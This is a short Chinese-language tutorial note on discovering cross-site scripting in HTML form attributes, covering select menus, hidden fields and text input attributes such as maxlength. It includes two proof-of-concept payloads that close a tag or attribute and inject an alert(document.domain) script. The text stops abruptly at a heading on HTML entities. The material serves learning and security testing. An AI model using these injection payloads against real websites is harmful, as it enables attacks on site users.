一、属性中的XSS发现
1、 select元素可创建单选或多选菜单
<select name="p2">
<option>Japan</option>
<option>Germany</option>
<option>USA</option>
<option>United Kingdom</option>
</select>
在select下拉框中输入,闭合标签
Japan</option><script>alert(document.domain);</script>
2、 HTML表单隐藏参数介绍
隐藏域是用来收集或发送信息的不可见元素,对于网页的访问者来说,隐藏域是看不见的。 当表单被提交时,隐藏域就会将信息用你设置时定义的名称和值发送到服务器上
3、 HTML表单文本框介绍
<input type='text' name='' value=''>
value 输入字段的初始值
readonly 输入字段为只读(不能修改)
disabled 输入字段是禁用的(disabled=disabled )
size 规定输入字段的字符
maxlength 输入字段允许最大长度
4、 payload触发XSS漏洞
修改maxlength的值,达到XSS攻击效果
"><script>alert(document.domain);</script>
5、 HTML事件介绍
W3C网址:http://www.w3school.com.cn/tags/html_ref_eventattributes.asp
HTML实体 :